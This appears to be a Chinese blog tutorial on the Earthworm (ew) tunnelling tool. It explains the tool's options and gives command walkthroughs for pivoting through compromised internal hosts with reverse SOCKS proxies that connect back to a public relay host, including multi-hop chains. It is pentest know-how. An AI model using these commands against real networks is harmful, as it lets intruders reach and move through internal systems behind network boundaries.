EW！一款便携式的网络穿透工具

EW介绍

Earthworm（ew）是一款便携式的网络穿透工具，基于标准C开发，具有socks v5服务架设和端口转发两大核心功能，可用于复杂网络环境下的数据转发。
该工具能通过“正向”，“反向”，“多级级联”等方式打通一条网络隧道。且工具包中提供了多种可执行文件，以适用于不同的操作系统（包括Linux、Windows、MacOS），使其更具有灵活性和通用性。

工具的使用
参数信息：
-l 指定要监听的本地端口
-d 指定要反弹到的机器 ip
-e 指定要反弹到的机器端口
-f 指定要主动连接的机器 ip
-g 指定要主动连接的机器端口
-t 指定超时的毫秒数，默认为 1000
-s 指定链路状态

六种链路状态：
ssocksd 正向socks 代理
rssocks 反向 socks 代理（server）
rcsocks 反向 socks 代理（client）
lcx_slave 将远程主机的端口与另一台主机的端口建立转发关系
lcx_tran 将本地端口转发至远程主机
lcx_listen 本地端口转发，本地端口之间建立转发关系

使用场景：

通过组合lcx类别管道的特性可以实现多层内网环境下的渗透测试。
【普通网络环境】

1. 目标网络边界存在公网IP且可任意开监听端口：

   ./ew -s ssocksd -l 7777
   

   //在1.1.1.1主机上通过这个命令开启7777端口的socks代理

   HackTools可通过访问1.1.1.1:7777端口使用1.1.1.1主机提供的代理。

2. 已经拿下一台内网服务器192.168.0.156，但目标网络边界（192.168.0.156）不存在公网IP，需要通过反弹方式创建socks代理：
   

./ew -s rcsocks -l 1080 -e 8888

在 192.168.0.55 的公网主机添加转接隧道，将 1080 收到的代理请求转交给反连 8888 端口的主机

 ./ew -s rssocks -d 192.168.0.55 -e 8888

// 将目标网络的可控边界主机反向连接公网主机
用fscan对192.168.0.156扫描结果如下:

我们可通过访问 192.168.0.55:1080端口使用 rssocks 主机提供的 socks5 代理服务
【二重网络环境】

获得目标网络内两台主机 A、B 的权限，情况描述如下：
主机A（192.168.0.156）：目标网络的边界主机，无公网 IP，无法访问特定资源。
主机B（172.18.25.85）：目标网络内部主机，可访问特定资源，却无法回连公网。
A 主机可直连 B 主机

./ew -s lcx_listen -l 1081 -e 8899

在 192.168.0.55公网主机添加转接隧道，将 1081 收到的代理请求
转交给反连 8899 端口的主机

./ew -s ssocksd -l 9999

在主机B（172.18.25.85） 主机上利用 ssocksd 方式启动 9999 端口的 socks 代理

 ./ew -s lcx_slave -d 192.168.0.55 -e 8899 -f 172.18.25.85 -g 9999

在主机A（192.168.0.156）上，通过工具的 lcx_slave 方式，打通192.168.0.55:8888 和 172.18.25.85:9999 之间的通讯隧道
我们可通过访问 192.168.0.55:1081 来使用 172.18.25.85 主机提供的 socks5 代理
用fscan对172.18.25.85进行扫描，扫描结果如下

通过访问192.168.0.55:1081来访问172.18.25.39

【本地三级跳】

./ew -s rcsocks -l 1080 -e 8888

./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

./ew -s lcx_listen -l 9999 -e 7777

./ew -s rssocks -d 127.0.0.1 -e 7777